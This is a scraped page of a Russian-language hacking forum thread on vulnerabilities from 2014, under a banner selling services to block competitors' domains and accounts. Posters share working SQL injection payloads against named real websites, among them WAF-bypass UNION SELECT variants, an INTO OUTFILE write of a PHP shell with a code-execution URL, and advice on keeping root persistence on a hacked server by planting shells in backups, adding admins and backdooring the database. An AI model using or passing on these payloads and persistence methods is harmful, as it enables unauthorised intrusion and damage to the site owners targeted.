Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2362 из 2438

2362

Опции темы

Поиск в этой теме

Опции просмотра

#23611

10.07.2014, 18:59

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

С нами: 8417113

Репутация: 0

Цитата:

Сообщение от vikler

то есть никак не раскрутить пример?

Сегодняшними методами - нет. Здесь PDO_MYSQL, возможно удастся использовать именно это.

#23612

10.07.2014, 21:34

Zen1T21

Участник форума

Регистрация: 13.01.2013

Сообщений: 157

С нами: 7015286

Репутация: 2

http://www.exploit-db.com/exploits/34025/

#23613

10.07.2014, 22:04

Inoms

Участник форума

Регистрация: 23.06.2013

Сообщений: 103

С нами: 6783446

Репутация: 45

Вы про одно забыли - файловые права

Код:

http://press.otherimages.com/search/text/cat:CEL?pag=1&display=1 into outfile "C:\\\\WEB\\\\UBUNTU\\\\OTHERIMAGESPRESS\\\\controller\\\\123.php" lines terminated by "111"

http://press.otherimages.com/controller/i.php?inoms=phpinfo%28%29;

#23614

15.07.2014, 03:16

Unknowhacker

Участник форума

Регистрация: 25.05.2013

Сообщений: 249

С нами: 6825206

Репутация: 24

Помогите обойти фильтр

Код:

http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9+--+

#23615

15.07.2014, 03:47

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

С нами: 10095779

Репутация: 137

Цитата:

Сообщение от Unknowhacker

Помогите обойти фильтр

Код:

http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9+--+

_ttp://www.mak-unatrac.com/index.php?pg=product_details&product_id=2%0B/*!12345%75NiON*/%0B/*!12345%73ElECT*/%0B1,version%28%29,3,4,5,6,7,8,9+--+

5.1.72-cll

P.S: Вариант с JOIN'ом))

Цитата:

Сообщение от None

http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2 /*!12345%75nion*/%0b(select * from (select 11) a1 join (select concat_ws(0x3a,user(),version(),database())) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9) --

#23616

15.07.2014, 09:39

YaBtr

Постоянный

Регистрация: 30.05.2012

Сообщений: 600

С нами: 7343606

Репутация: 652

Цитата:

Сообщение от Unknowhacker

Помогите обойти фильтр

Код:

http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9+--+

Предложу еще свой вариант:

Цитата:

Сообщение от None

product_id=2 union+--+%0Aselect 1,version()/*!,*/3/*!,*/4/*!,*/5/*!,*/6/*!,*/7/*!,*/8/*!,*/9--

+ так же с join проходит

#23617

15.07.2014, 13:57

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

С нами: 8417113

Репутация: 0

YaBtr,В твоем варианте нельзя использовать FROM (срабатывает WAF). Уwinstroolотлично получилось склеить цифры с union. Можно упростить:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]2[/COLOR][COLOR="#FF8000"]/*!12345union*/[/COLOR][COLOR="#0000BB"]select 1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"]--

[/COLOR][/COLOR]

#23618

16.07.2014, 22:46

Aniweste

Новичок

Регистрация: 28.05.2010

Сообщений: 0

С нами: 8397749

Репутация: 0

Есть сайт http://site.com

Есть шелл на этом сайте и возможность получить root-а

Вопрос: как закрепится в системе, если раз в 24 часа происходит откат всех файлов из бекапа?

Вариант с подменой архива с бекапом - не вариант.

Mysql вертится на другом сервере.

#23619

17.07.2014, 00:02

OxoTnik

Постоянный

Регистрация: 10.06.2011

Сообщений: 939

С нами: 7854806

Репутация: 173

Цитата:

Сообщение от Aniweste

Есть сайт http://site.com
Есть шелл на этом сайте и возможность получить root-а
Вопрос:
как закрепится в системе, если раз в 24 часа происходит откат всех файлов из бекапа?
Вариант с подменой архива с бекапом - не вариант.
Mysql вертится на другом сервере.

а тебе mysql не нужен для подмены бекапа, ты подменяешь файлы, а не БД, следовательно суёшь шелл в бекап.

да и вообще если уже ты рут, то добавь второго админа или тупо выключи откат.

#23620

17.07.2014, 01:08

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

С нами: 8866466

Репутация: 564

Отправить сообщение для shell_c0de с помощью AIM

Цитата:

Сообщение от Aniweste

Есть сайт http://site.com
Есть шелл на этом сайте и возможность получить root-а
Вопрос:
как закрепится в системе, если раз в 24 часа происходит откат всех файлов из бекапа?
Вариант с подменой архива с бекапом - не вариант.
Mysql вертится на другом сервере.

забэкдурь и БД и двиг.

http://raz0r.name/obzory/mysql-bekdor-dlya-windows/ для венды от Разора (старье но временами работает)

https://rdot.org/forum/showthread.php?t=677 отличный вариант от Типсей

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.

Страница 2362 из 2438

2362

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход